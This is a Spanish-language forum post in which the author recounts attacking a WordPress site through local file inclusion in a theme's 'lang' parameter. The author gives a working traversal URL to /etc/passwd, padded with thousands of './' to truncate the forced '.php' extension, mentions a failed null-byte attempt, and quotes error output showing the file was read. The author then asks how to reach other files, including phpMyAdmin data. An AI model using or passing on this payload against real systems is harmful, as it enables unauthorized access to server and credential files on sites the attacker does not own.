Autor
Al intentar un simple ../../etc/passwd me tira este error
Warning: require_once(lang/../etc/passwd.php) [function.require-once]: failed to open stream: No such file or directory in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxx.111.xxx/single.php on line 6
muy seguramente tiene que tener esto algo como esto
" include($_GET['page'] . '.php'); " en el codigo donde permite solo .php
luego intente con un NULL bye %00 pero estaba tambien con filtro dejandomelo en \0 asi que decidi usar "fuerza automatizada" jajaja y me saco esto.
http://webafectada.com/123123/?lang=de&lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
con eso pude ver el passwd y ya no pedia el .php al ultimo como extension me parecio algo extraño y mire el error a ver si lo logran entender:
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /etc/passwd:12) in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxxxxx/header.php on line 3
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /etc/passwd:12) in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxx.1111.xxx/header.php on line 3
asi logre ver el /etc/passwd pero deseo saber PORQUE? que quiere decir eso? y porque cuando quiero ver otros archivos mas que todo fuera del etc o fuera de su directorio no logro verlo ellos tienen un PHPMYADMIN y no logro verlos aun sabiendo el path completo.
Si alguien puede entenderlo mejor el porque de ese error me ayudaria mucho
En línea
